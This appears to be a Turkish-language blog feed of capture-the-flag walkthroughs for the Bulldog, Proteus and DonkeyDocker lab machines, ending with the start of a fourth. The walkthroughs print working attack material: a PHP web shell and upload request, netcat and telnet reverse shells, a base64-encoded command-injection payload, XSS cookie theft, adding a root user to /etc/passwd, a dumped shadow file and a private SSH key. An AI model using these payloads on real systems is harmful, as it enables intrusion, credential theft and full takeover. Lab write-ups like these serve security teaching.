Makinamızın ip adresini gösteren script ekledikleri için direk nmap ile agresif taramamızı gerçekleştiriyorum. Taramamı nmap 192.168.131.2 -A komutuyla gerçekleştiriyorum. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-29 18:26 +03 Nmap scan report for 192.168.131.2 Host is up (0.0017s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 […]
]]>Makinamızın ip adresini gösteren script ekledikleri için direk nmap ile agresif taramamızı gerçekleştiriyorum.
Taramamı nmap 192.168.131.2 -A komutuyla gerçekleştiriyorum.
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-29 18:26 +03 Nmap scan report for 192.168.131.2 Host is up (0.0017s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA) | 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA) |_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (EdDSA) 80/tcp open http WSGIServer 0.1 (Python 2.7.12) |_http-server-header: WSGIServer/0.1 Python/2.7.12 |_http-title: Bulldog Industries 8080/tcp open http WSGIServer 0.1 (Python 2.7.12) |_http-server-header: WSGIServer/0.1 Python/2.7.12 |_http-title: Bulldog Industries MAC Address: D4:61:9D:23:E0:B6 (Apple) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 1.68 ms 192.168.131.2 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.08 seconds
80 ve 8080 portlarında çalışan http servislerini inceliyorum. Dizinleri incelemek için dirb http://192.168.131.2 komutunu kullanıyorum.
---- Scanning URL: http://192.168.131.2/ ---- ==> DIRECTORY: http://192.168.131.2/admin/ ==> DIRECTORY: http://192.168.131.2/dev/ + http://192.168.131.2/robots.txt (CODE:200|SIZE:1071) ---- Entering directory: http://192.168.131.2/admin/ ---- ==> DIRECTORY: http://192.168.131.2/admin/auth/ ==> DIRECTORY: http://192.168.131.2/admin/login/ ==> DIRECTORY: http://192.168.131.2/admin/logout/ ---- Entering directory: http://192.168.131.2/dev/ ---- ==> DIRECTORY: http://192.168.131.2/dev/shell/ ---- Entering directory: http://192.168.131.2/admin/auth/ ---- ==> DIRECTORY: http://192.168.131.2/admin/auth/group/ ==> DIRECTORY: http://192.168.131.2/admin/auth/user/ ---- Entering directory: http://192.168.131.2/admin/login/ ---- ---- Entering directory: http://192.168.131.2/admin/logout/ ---- ---- Entering directory: http://192.168.131.2/dev/shell/ ---- ---- Entering directory: http://192.168.131.2/admin/auth/group/ ---- (!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}. (Try using FineTunning: '-f') ---- Entering directory: http://192.168.131.2/admin/auth/user/ ---- (!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}. (Try using FineTunning: '-f') -----------------
Dizinleri incelediğimde view-source:http://192.168.131.2/dev/ adresinde açıklama satırı olarak yetkili kişilerin hash bilgilerinin olduğunu farkettim.
<!--Need these password hashes for testing. Django's default is too complex--> <!--We'll remove these in prod. It's not like a hacker can do anything with a hash--> Team Lead: [email protected]<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb--> Back-up Team Lead: [email protected]<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb--> Front End: [email protected]<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279--> Front End: [email protected]<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9--> Back End: [email protected]<br><!--553d917a396414ab99785694afd51df3a8a8a3e0--> Back End: [email protected]<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5--> Database: [email protected]<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e--
Ayrıca http://192.168.131.2/dev/shell/ adresinde doğrulama yaptıktan sonra gelecek bir sayfa vardı.
Kırılmış hash değerleri aşağıdaki gibi oldu.
6515229daf8dbdc8b89fed2e60f107433da5f2cb [Not found] 38882f3b81f8f2bc47d9f3119155b05f954892fb [Not found] c6f7e34d5d08ba4a40dd5627508ccb55b425e279 [Not found] 0e6ae9fe8af1cd4192865ac97ebf6bda414218a9 [Not found] 553d917a396414ab99785694afd51df3a8a8a3e0 [Not found] ddf45997a7e18a25ad5f5cf222da64814dd060d5 SHA1 : bulldog d8b8dd5e7f000b8dea26ef8428caf38c04466b3e SHA1 : bulldoglover
Yine dizin taramasından bulduğumuz admin paneline http://192.168.131.2/admin adresinden erişiyorum. nick:bulldog bilgileriyle giriş yapıyorum.
Siteye giriş yaptıktan sonra web shell’i kullanabiliriz.Sıradan bir kod girdiğimde çalıştırdı.
İzin verilen kodlar aşağıdaki şekilde.
ifconfig ls echo pwd cat rm
Bu kodlar haricinde kod çalıştırmayı denediğimde aldığım hata bu şekilde.
ls -la && pwd şeklinde bypass’ladım.
Önemli olan burda; kod çalıştırabileceğimiz bir noktada, makina ile bağlantı kurabilmek. Yani reverse shell almak.
pwd && mknod berk p && telnet 192.168.131.8 4445 0<berk | /bin/bash 1>berk komutuyla bağlantımı aldım.
İlk yaptığım her zaman etkileşimli shell’e geçmektir. python -c ‘import pty; pty.spawn(“/bin/bash”)’ kodu ile geçiş yapıyorum.
Dizinleri gezerken bulldogadmin kullanıcısında .hiddenadmindirectory dizini dikkatimi çekti, dizini listeledim.
Not dosyasından çıkan bu şekilde;
Nick, I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not! It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes? Let me know what you think of it! -Ashley
Haliyle file customPermissionApp komutuyla dosyamı inceledim ve strings komutuyla inceledim.
Çeşitli denemelerden sonra parolanın “SUPERultimatePASSWORDyouCANTget” olduğunu bulup root kullanıcına geçiyorum.
Root dizininde congrats.txt dosyasını ihmal etmeyelim
Congratulations on completing this VM :D That wasn't so bad was it? Let me know what you thought on twitter, I'm @frichette_n As far as I know there are two ways to get root. Can you find the other one? Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!
]]>
Makinamızın ip adresini tespit etmek için nmap 192.168.1.0/24 veya arp-scan 192.168.1.0/24 komutlarını kullanabiliriz. Ip adresimi öğrendikten sonra agresif tarama yapıyorum. 80 ve 22 portuna o kadar alıştım ki senaryo az çok kafamda canlandı. 80 portunda çalışan servisten ssh bağlantı bilgilerini alabiliriz diye düşünüyorum, bakalım… Senaryo malware analizi yapan bir site üzerine kurulmuş. Dosya yükleme yeri […]
]]>Makinamızın ip adresini tespit etmek için nmap 192.168.1.0/24 veya arp-scan 192.168.1.0/24 komutlarını kullanabiliriz.
Ip adresimi öğrendikten sonra agresif tarama yapıyorum.
80 ve 22 portuna o kadar alıştım ki senaryo az çok kafamda canlandı. 80 portunda çalışan servisten ssh bağlantı bilgilerini alabiliriz diye düşünüyorum, bakalım…
Senaryo malware analizi yapan bir site üzerine kurulmuş. Dosya yükleme yeri gördüğümde her zaman önce web shell yüklemeyi denerim.
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?>
Klasik bir web shell kodudur. http://192.168.1.20/shell.php?cmd=whoami şeklinde kullanılır. Shelli yüklemeye çalıştığımda aşağıdaki gibi invalid mimetype hatası aldım.
Desteklediği formatları “application/x-executable, application/x-sharedlib” olarak belirtmiş. İsteği değiştirerek tekrar gönderiyorum.
POST /submit HTTP/1.1
Host: 192.168.1.20
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------15114079911693627682090237232
Content-Length: 388
Referer: http://192.168.1.20/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------15114079911693627682090237232
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-executable
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
-----------------------------15114079911693627682090237232--
application/x-executable yapıp tekrar gönderdiğimde yine başarısız oldum. Kabul ettiği formatta bir dosya yüklemeyi deneyelim.
Burda dikkatimi çeken dosya adlarının base64 ile encode olması. attığımız dosyaların /home/malwareadm/samples klasörüne kaydolması. Stringsleri göstermesi yazdığım kodu da çalıştırabileceğini düşündürdü.
Çok basit şekilde bir xss payload yazdım <img src=a onerror=alert(‘XSS’)> . Şimdi burda en çok merak edilen sorulardan birine yanıt bulmayı isterim, “xss ile alert vermekten öteye geçemez miyiz?” geçeriz.
Genellikle malware analiz sitelerinde (eskiden camas.comodo.com vardı anubis vardı) gönderdiğiniz malware otomatize şekilde incelenmenin dışında manuel olarak da bakılıyorsa https://cit.valkyrie.comodo.com/ gibi, gönderdiğiniz kod yetkili kullanıcılarda da çalışacak demektir. Bu durumda session yani oturum bilgilerini elde edebiliriz. Eskiden sorgulu sorgusuz downloader’lar ile direk rat(remote administrator tool) serverları gönderilirdi. Hatta chrome’da bulunan bir 0day ile siz siteye girdiğinizde exploit çoktan çalışmış sistemi ele geçirmiş olurdu ( yıl 2013).
Burada bizim yapacağımız da çerezleri elde etmek, bunun için apache servisimi çalıştırıp loglara düşmesini sağlıyorum.
Tail -f ile log dosyasını inceliyorum. Tail -f diyince burdan Caner Filibelioglu‘na ve Mustafa Kaan Demirhan‘a büyük fontlarla selam olsun, Enes sana yok
192.168.1.20 - - [26/Jun/2017:22:42:01 -0400] "GET /?cookie=proteus_session=1498525321%7Cj0UwsAI4bPM6hnqlPLpaIGYMxF3aBtI1S9Ol84IpY3YfC%2FcDT8Za1htY91c%2Bj%2FUpnd%2Bi%2Btmh8z6DdTVtZwS9JAH88WyMQDRGR%2FA6dl5OEzvrToKj2YzHSujIn9UDeLMX%7C3128832d24bc9bec2f8f15bdb81c1124717a443f HTTP/1.1" 200 3380 "http://127.0.0.1/samples" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
Logları incelediğimizde proteus_session başlıklı çerezi görüyoruz. Deneyelim…
Bunun için tarayıcılardaki eklentileri veya proxy araçlarını kullanabilirsiniz.
Cookie ekledikten sonra yetkiyi aldım.
Mantıken normal kullanıcı yetkisiyle ulaşamadığınız, malwareadm kullanıcısı ile erişiminizin olduğu bir yerde zafiyet olmalıydı. O da gelen malware dosyalarını silmek için gönderilen istek.
Base64 ile http://192.168.1.20/delete/NTk1MWJhNDZhYWU0Yi5iaW4= şeklinde gönderilen istekte remote code execiton zafiyeti mevcut. Burdan reverse shell almamız gerek. (bkz. EN | Reverse Shell Cheat Sheet )
Ayrıca yüklediğimiz dosyadan kod çalıştırabildiğimiz için proxy ile araya girerek de bağlantı alabilirdik.
5951ba46aae4b.bin ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.24 4545 >/tmp/f NTk1MWJhNDZhYWU0Yi5iaW4gO3JtIC90bXAvZjtta2ZpZm8gL3RtcC9mO2NhdCAvdG1wL2Z8L2Jpbi9zaCAtaSAyPiYxfG5jIDE5Mi4xNjguMS4yNCA0NTQ1ID4vdG1wL2Y=
Reverse shell almak için gerekli komutlarımı base64 ile encode edip gönderdim ve bağlantı geldi.
Bir boşluk yanlış koymamdan dolayı 5 defa bağlantım kesildi.
Şimdi ssh portunun açık olması bana burda priva key elde etmemiz gerektiğini düşündürse de başaramadım. Gece Hakkı Yüce ile tartışırken geldi rootladı
Öncelikle uzun uzun baktıkran sonra bayağı root senaryosu olduğunu farkettik. Gelelim root olmaya…
/home/malwareadm/sites/proteus_site dizinini kurcalarken çerezini alarak girdiğimiz malwareadm kullanıcısının parolasını elde ettik.
// THIS IS JUST USED TO IMPERSONATE AN ADMIN FOR THE CHALLENGE var username = 'malwareadm'; var pwd = 'q-L%40X%21%7Bl_%278%7C%29o%3FQ%2BTapahQ%3C_'; var webPage = require('webpage'); var page = webPage.create(); var postBody = 'username=' + username + '&password=' + pwd; page.open('http://127.0.0.1/samples', 'post', postBody, function (status) { if (status !== 'success') { console.log('Unable to post!'); } else { console.log(JSON.stringify({ cookies: phantom.cookies })); } phantom.exit(); });
Url decode ile q-L@X!{l_’8|)o?Q+TapahQ<_ parolasını elde ettik.
Şu an etkileşimli kabukta olmadığımız için sudo gibi komutları çalıştıramıyoruz. Bu yüzden python -c ‘import pty; pty.spawn(“/bin/sh”)’ ile etkileşimli shelle geçiyorum.
su malwareadm ile kullanıcıya geçtik. sudo su ile de root kullanıcısını aldık.
root@Proteus:/home/malwareadm/sites/proteus_site# cat /etc/shadow cat /etc/shadow root:!:17288:0:99999:7::: daemon:*:17086:0:99999:7::: bin:*:17086:0:99999:7::: sys:*:17086:0:99999:7::: sync:*:17086:0:99999:7::: games:*:17086:0:99999:7::: man:*:17086:0:99999:7::: lp:*:17086:0:99999:7::: mail:*:17086:0:99999:7::: news:*:17086:0:99999:7::: uucp:*:17086:0:99999:7::: proxy:*:17086:0:99999:7::: www-data:*:17086:0:99999:7::: backup:*:17086:0:99999:7::: list:*:17086:0:99999:7::: irc:*:17086:0:99999:7::: gnats:*:17086:0:99999:7::: nobody:*:17086:0:99999:7::: systemd-timesync:*:17086:0:99999:7::: systemd-network:*:17086:0:99999:7::: systemd-resolve:*:17086:0:99999:7::: systemd-bus-proxy:*:17086:0:99999:7::: syslog:*:17086:0:99999:7::: _apt:*:17086:0:99999:7::: messagebus:*:17086:0:99999:7::: lxd:*:17288:0:99999:7::: uuidd:*:17288:0:99999:7::: dnsmasq:*:17288:0:99999:7::: sshd:*:17288:0:99999:7::: pollinate:*:17288:0:99999:7::: malwareadm:$6$C7ZB0G8M$wMCrGeGYvmLb9QkQ.ELBZNrFO6vMVnKboahpMY1vBqCO53FqkUgeyIWLn0Dg3SY5I66rej.LGIGAaDs6gDiV0.:17296:0:99999:7::: mysql:!:17288:0:99999:7:::
root@Proteus:/home/malwareadm/sites/proteus_site# id id uid=0(root) gid=0(root) groups=0(root) root@Proteus:/home/malwareadm/sites/proteus_site#
Root yetkisiyle çalışan admin_login_logger dikkatimizi çekti.
Çalıştırdığımızda aşağıdaki gibi kullanımını belirtti.
./admin_login_logger Usage: ./admin_login_logger ADMIN LOGIN ATTEMPT (This will be done with phantomjs)
Rastgele bir kod çalıştırdığımızda /var/log/proteus/log altına kayıt olduğunu söyledi.
./admin_login_logger cat /etc/passwd Writing datafile 0x941c1d0: '/var/log/proteus/log'
Burda istediğiniz gibi kod çalıştırabilir kendi kullanıcınızı ekleyebilirsiniz.
DonkeyDocker makinasındaki mantıkla
echo 'berk:x:0:0::/root:/bin/bash' >> /etc/passwd python( -c ' print " berk:!:0:0:berk:/home:berk:/bin/bash "/etc/passwd" ')
gibi komutlarla root yetkisine erişebilirsiniz. Son olarak root dizinindeki flag…
]]>Öncelikle makinamızın ip adresini tespit edelim. arp-scan 172.189.64.0/24 komutu ile arp taraması yaptıktan sonra mac adresinden 172.189.64.141 ip adresini öğreniyorum. Nmap ile detaylı port taraması yapalım. nmap 172.189.64.141 -A komutu ile çıktımıza bakalım. Dirbuster aracı ile dizinleri tarayalım. dirb http://172.189.64.141 GENERATED WORDS: 4612 ---- Scanning URL: http://172.189.64.141/ ---- + http://172.189.64.141/about (CODE:200|SIZE:2098) + http://172.189.64.141/admin.php (CODE:301|SIZE:315) ==> DIRECTORY: http://172.189.64.141/assets/ + […]
]]>Öncelikle makinamızın ip adresini tespit edelim.
arp-scan 172.189.64.0/24 komutu ile arp taraması yaptıktan sonra mac adresinden 172.189.64.141 ip adresini öğreniyorum. Nmap ile detaylı port taraması yapalım.
nmap 172.189.64.141 -A komutu ile çıktımıza bakalım.
Dirbuster aracı ile dizinleri tarayalım. dirb http://172.189.64.141
GENERATED WORDS: 4612 ---- Scanning URL: http://172.189.64.141/ ---- + http://172.189.64.141/about (CODE:200|SIZE:2098) + http://172.189.64.141/admin.php (CODE:301|SIZE:315) ==> DIRECTORY: http://172.189.64.141/assets/ + http://172.189.64.141/contact (CODE:200|SIZE:3207) ==> DIRECTORY: http://172.189.64.141/css/ ==> DIRECTORY: http://172.189.64.141/dist/ + http://172.189.64.141/index (CODE:200|SIZE:4090) + http://172.189.64.141/index.php (CODE:301|SIZE:315) + http://172.189.64.141/info.php (CODE:301|SIZE:314) ==> DIRECTORY: http://172.189.64.141/mailer/ + http://172.189.64.141/phpinfo.php (CODE:301|SIZE:317) + http://172.189.64.141/robots.txt (CODE:200|SIZE:79) + http://172.189.64.141/server-status (CODE:403|SIZE:302) + http://172.189.64.141/xmlrpc.php (CODE:301|SIZE:316) + http://172.189.64.141/xmlrpc_server.php (CODE:301|SIZE:323) ---- Entering directory: http://172.189.64.141/assets/ ---- + http://172.189.64.141/assets/admin.php (CODE:301|SIZE:322) + http://172.189.64.141/assets/index.php (CODE:301|SIZE:322) + http://172.189.64.141/assets/info.php (CODE:301|SIZE:321) ==> DIRECTORY: http://172.189.64.141/assets/js/ + http://172.189.64.141/assets/phpinfo.php (CODE:301|SIZE:324) + http://172.189.64.141/assets/xmlrpc.php (CODE:301|SIZE:323) + http://172.189.64.141/assets/xmlrpc_server.php (CODE:301|SIZE:330) ---- Entering directory: http://172.189.64.141/css/ ---- + http://172.189.64.141/css/admin.php (CODE:301|SIZE:319) + http://172.189.64.141/css/index.php (CODE:301|SIZE:319) + http://172.189.64.141/css/info.php (CODE:301|SIZE:318) + http://172.189.64.141/css/phpinfo.php (CODE:301|SIZE:321) + http://172.189.64.141/css/xmlrpc.php (CODE:301|SIZE:320) + http://172.189.64.141/css/xmlrpc_server.php (CODE:301|SIZE:327) ---- Entering directory: http://172.189.64.141/dist/ ---- + http://172.189.64.141/dist/admin.php (CODE:301|SIZE:320) ==> DIRECTORY: http://172.189.64.141/dist/css/ ==> DIRECTORY: http://172.189.64.141/dist/font/ + http://172.189.64.141/dist/index.php (CODE:301|SIZE:320) + http://172.189.64.141/dist/info.php (CODE:301|SIZE:319) + http://172.189.64.141/dist/phpinfo.php (CODE:301|SIZE:322) + http://172.189.64.141/dist/xmlrpc.php (CODE:301|SIZE:321) + http://172.189.64.141/dist/xmlrpc_server.php (CODE:301|SIZE:328) ---- Entering directory: http://172.189.64.141/mailer/ ---- + http://172.189.64.141/mailer/admin.php (CODE:301|SIZE:322) ==> DIRECTORY: http://172.189.64.141/mailer/docs/ ==> DIRECTORY: http://172.189.64.141/mailer/examples/ ==> DIRECTORY: http://172.189.64.141/mailer/extras/ + http://172.189.64.141/mailer/index.php (CODE:301|SIZE:322) + http://172.189.64.141/mailer/info.php (CODE:301|SIZE:321) ==> DIRECTORY: http://172.189.64.141/mailer/language/ + http://172.189.64.141/mailer/LICENSE (CODE:200|SIZE:26421) + http://172.189.64.141/mailer/phpinfo.php (CODE:301|SIZE:324) ==> DIRECTORY: http://172.189.64.141/mailer/test/ + http://172.189.64.141/mailer/xmlrpc.php (CODE:301|SIZE:323) + http://172.189.64.141/mailer/xmlrpc_server.php (CODE:301|SIZE:330) ---- Entering directory: http://172.189.64.141/assets/js/ ---- + http://172.189.64.141/assets/js/admin.php (CODE:301|SIZE:325) + http://172.189.64.141/assets/js/index.php (CODE:301|SIZE:325) + http://172.189.64.141/assets/js/info.php (CODE:301|SIZE:324) + http://172.189.64.141/assets/js/phpinfo.php (CODE:301|SIZE:327) + http://172.189.64.141/assets/js/xmlrpc.php (CODE:301|SIZE:326) + http://172.189.64.141/assets/js/xmlrpc_server.php (CODE:301|SIZE:333) ---- Entering directory: http://172.189.64.141/dist/css/ ---- + http://172.189.64.141/dist/css/admin.php (CODE:301|SIZE:324) + http://172.189.64.141/dist/css/index.php (CODE:301|SIZE:324) + http://172.189.64.141/dist/css/info.php (CODE:301|SIZE:323) + http://172.189.64.141/dist/css/phpinfo.php (CODE:301|SIZE:326) + http://172.189.64.141/dist/css/xmlrpc.php (CODE:301|SIZE:325) + http://172.189.64.141/dist/css/xmlrpc_server.php (CODE:301|SIZE:332) ---- Entering directory: http://172.189.64.141/dist/font/ ---- + http://172.189.64.141/dist/font/admin.php (CODE:301|SIZE:325) + http://172.189.64.141/dist/font/index.php (CODE:301|SIZE:325) + http://172.189.64.141/dist/font/info.php (CODE:301|SIZE:324) + http://172.189.64.141/dist/font/phpinfo.php (CODE:301|SIZE:327) + http://172.189.64.141/dist/font/xmlrpc.php (CODE:301|SIZE:326) + http://172.189.64.141/dist/font/xmlrpc_server.php (CODE:301|SIZE:333) ---- Entering directory: http://172.189.64.141/mailer/docs/ ---- + http://172.189.64.141/mailer/docs/admin.php (CODE:301|SIZE:327) + http://172.189.64.141/mailer/docs/index.php (CODE:301|SIZE:327) + http://172.189.64.141/mailer/docs/info.php (CODE:301|SIZE:326) + http://172.189.64.141/mailer/docs/phpinfo.php (CODE:301|SIZE:329) + http://172.189.64.141/mailer/docs/xmlrpc.php (CODE:301|SIZE:328) + http://172.189.64.141/mailer/docs/xmlrpc_server.php (CODE:301|SIZE:335) ---- Entering directory: http://172.189.64.141/mailer/examples/ ---- + http://172.189.64.141/mailer/examples/admin.php (CODE:301|SIZE:331) ==> DIRECTORY: http://172.189.64.141/mailer/examples/images/ + http://172.189.64.141/mailer/examples/index.html (CODE:200|SIZE:6289) + http://172.189.64.141/mailer/examples/index.php (CODE:301|SIZE:331) + http://172.189.64.141/mailer/examples/info.php (CODE:301|SIZE:330) + http://172.189.64.141/mailer/examples/phpinfo.php (CODE:301|SIZE:333) ==> DIRECTORY: http://172.189.64.141/mailer/examples/scripts/ ==> DIRECTORY: http://172.189.64.141/mailer/examples/styles/ + http://172.189.64.141/mailer/examples/xmlrpc.php (CODE:301|SIZE:332) + http://172.189.64.141/mailer/examples/xmlrpc_server.php (CODE:301|SIZE:339) ---- Entering directory: http://172.189.64.141/mailer/extras/ ---- + http://172.189.64.141/mailer/extras/admin.php (CODE:301|SIZE:329) + http://172.189.64.141/mailer/extras/index.php (CODE:301|SIZE:329) + http://172.189.64.141/mailer/extras/info.php (CODE:301|SIZE:328) + http://172.189.64.141/mailer/extras/phpinfo.php (CODE:301|SIZE:331) + http://172.189.64.141/mailer/extras/xmlrpc.php (CODE:301|SIZE:330) + http://172.189.64.141/mailer/extras/xmlrpc_server.php (CODE:301|SIZE:337) ---- Entering directory: http://172.189.64.141/mailer/language/ ---- + http://172.189.64.141/mailer/language/admin.php (CODE:301|SIZE:331) + http://172.189.64.141/mailer/language/index.php (CODE:301|SIZE:331) + http://172.189.64.141/mailer/language/info.php (CODE:301|SIZE:330) + http://172.189.64.141/mailer/language/phpinfo.php (CODE:301|SIZE:333) + http://172.189.64.141/mailer/language/xmlrpc.php (CODE:301|SIZE:332) + http://172.189.64.141/mailer/language/xmlrpc_server.php (CODE:301|SIZE:339) ---- Entering directory: http://172.189.64.141/mailer/test/ ---- + http://172.189.64.141/mailer/test/admin.php (CODE:301|SIZE:327) + http://172.189.64.141/mailer/test/index.php (CODE:301|SIZE:327) + http://172.189.64.141/mailer/test/info.php (CODE:301|SIZE:326) + http://172.189.64.141/mailer/test/phpinfo.php (CODE:301|SIZE:329) + http://172.189.64.141/mailer/test/xmlrpc.php (CODE:301|SIZE:328) + http://172.189.64.141/mailer/test/xmlrpc_server.php (CODE:301|SIZE:335) ---- Entering directory: http://172.189.64.141/mailer/examples/images/ ---- + http://172.189.64.141/mailer/examples/images/admin.php (CODE:301|SIZE:338) + http://172.189.64.141/mailer/examples/images/index.php (CODE:301|SIZE:338) + http://172.189.64.141/mailer/examples/images/info.php (CODE:301|SIZE:337) + http://172.189.64.141/mailer/examples/images/phpinfo.php (CODE:301|SIZE:340) + http://172.189.64.141/mailer/examples/images/xmlrpc.php (CODE:301|SIZE:339) + http://172.189.64.141/mailer/examples/images/xmlrpc_server.php (CODE:301|SIZE:346) ---- Entering directory: http://172.189.64.141/mailer/examples/scripts/ ---- + http://172.189.64.141/mailer/examples/scripts/admin.php (CODE:301|SIZE:339) + http://172.189.64.141/mailer/examples/scripts/index.php (CODE:301|SIZE:339) + http://172.189.64.141/mailer/examples/scripts/info.php (CODE:301|SIZE:338) + http://172.189.64.141/mailer/examples/scripts/phpinfo.php (CODE:301|SIZE:341) + http://172.189.64.141/mailer/examples/scripts/xmlrpc.php (CODE:301|SIZE:340) + http://172.189.64.141/mailer/examples/scripts/xmlrpc_server.php (CODE:301|SIZE:347) ---- Entering directory: http://172.189.64.141/mailer/examples/styles/ ---- + http://172.189.64.141/mailer/examples/styles/admin.php (CODE:301|SIZE:338) + http://172.189.64.141/mailer/examples/styles/index.php (CODE:301|SIZE:338) + http://172.189.64.141/mailer/examples/styles/info.php (CODE:301|SIZE:337) + http://172.189.64.141/mailer/examples/styles/phpinfo.php (CODE:301|SIZE:340) + http://172.189.64.141/mailer/examples/styles/xmlrpc.php (CODE:301|SIZE:339) + http://172.189.64.141/mailer/examples/styles/xmlrpc_server.php (CODE:301|SIZE:346)
Robots.txt ve diğer dizinlerde çok önemli bilgiler bulamadım. Vulnhub’ı takip ettiğim için phpmailer zafiyeti için makina çıkacağını tahmin etmekteydim. Baktığımız zaman phpmailer kullanıldığını görüyoruz. http://172.189.64.141/mailer/VERSION adresinden 5.2.16 sürümü olduğunu öğrendim. Bu sürüme ait exploiti searchsploit aracı ile veya exploit-db’den elde edebilirsiniz.
https://www.exploit-db.com/exploits/40974/ adresindeki exploiti kullandım. Gerekli yerleri düzenlerek çalıştırıyorum.
Exploit çalıştı. http://172.189.64.141/backdoor.php adresinden reverse shell alıyorum.
Dizinler arasında geçiş yaparken main.sh dosyasını okuyorum. Görüldüğü gibi smith adında bir kullanıcı var ve ilk flag ordan alınacak. Home dizininden girmeyi deneyelim.
Smith dizinine geçmeye çalıştığımızda yetkimiz olmadığını görüyoruz.
$ cd smith cd smith /bin/sh: 20: cd: can't cd to smith
Smith kullanıcısının yetkisine erişmek parola tahmini kadar kolay oldu.
$ su smith su smith Password: smith
Gerekli yetkiyi edindikten sonra ilk bayrağı yakalıyoruz.
Bu aşamadan sonra ya uygun exploit bularak root olmayı düşündüm ama ssh portunun açık olması ve .ssh dizini olması exploit kullanmaya gerek kalmadığını gösterdi.
Private Key’i elde ettik.
-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW QyNTUxOQAAACAhAQc3H36SyC4F6mO+/s+/wMLKL8/45ITnf9Hw47xKHwAAAJhsQyB3bEMg dwAAAAtzc2gtZWQyNTUxOQAAACAhAQc3H36SyC4F6mO+/s+/wMLKL8/45ITnf9Hw47xKHw AAAEAeyAfJp42y9KA/K5Q4M33OM5x3NDtKC2IljG4xT+orcCEBBzcffpLILgXqY77+z7/A wsovz/jkhOd/0fDjvEofAAAAE29yd2VsbEBkb25rZXlkb2NrZXIBAg== -----END OPENSSH PRIVATE KEY-----
ssh -i txt.txt [email protected] komutu ile bağlantıyı sağladık.
İkinci bayrağımızı bu dizin içerisinden elde ettik.
You tried harder! Good work ;-) Here a flag for your effort: flag01{e20523853d6733721071c2a4e95c9c60}
Hala root değiliz.
donkeydocker:/$ id uid=1000(orwell) gid=1000(orwell) groups=101(docker),1000(orwell)
Bu noktadan sonra docker yapısını araştırmam ve root olmayı öğrenmem 1 haftamı aldı. Ben makinayı çözene kadar Vm lisansı bitti
flag.txt dosyasını silip /etc/passwd dosyası olarak gösteriyoruz.
docker restart donkeydocker komutu ile yeniden başlatıyoruz.
Şimdi /etc/passwd dosyamıza kendi root haklarındaki kullanıcıyı eklememiz gerek. Bunun için echo ‘berk:x:0:0::/root:/bin/bash’ >> /etc/passwd komutunu kullanıyoruz.
Haliyle shadow dosyasından da parolayı vermek gerek, kendi parolamı kopyala yapıştır yaptım.
echo ‘berk:R2JhrPXIXqW3g:17251:0:99999:7:::’ >> /etc/shadow (tabii ki bu değil )
donkeydocker:/home/orwell# id uid=0(root) gid=0(root) groups=0(root) donkeydocker:/home/orwell#
Ve Son flag…
YES!! You did it :-). Congratulations! I hope you enjoyed this CTF VM. Drop me a line on twitter @dhn_, or via email [email protected] Here is your flag: flag2{60d14feef575bacf5fd8eb06ec7cd8e7}
]]>
Seviyesi zor olarak belirlenmiş bir makina. Beni de bayağı zorladı 🙂 Bazı yerlerde ip değişikliğinin olması, makinayı uzun sürede başka ağlara bağlanıp çözmemden dolayı. Makinamızın ip adresini öğrenmek için sudo nmap 172.189.64.0/24 komutunu veriyorum. Ağımda fazla cihaz olsaydı netdiscover veya arp taraması kullanabilirdim. Örneğin ortak bir ağda çalıştığımda nmap çalıştırmak uzun süreceği için sudo arp-scan […]
]]>Seviyesi zor olarak belirlenmiş bir makina. Beni de bayağı zorladı Bazı yerlerde ip değişikliğinin olması, makinayı uzun sürede başka ağlara bağlanıp çözmemden dolayı.
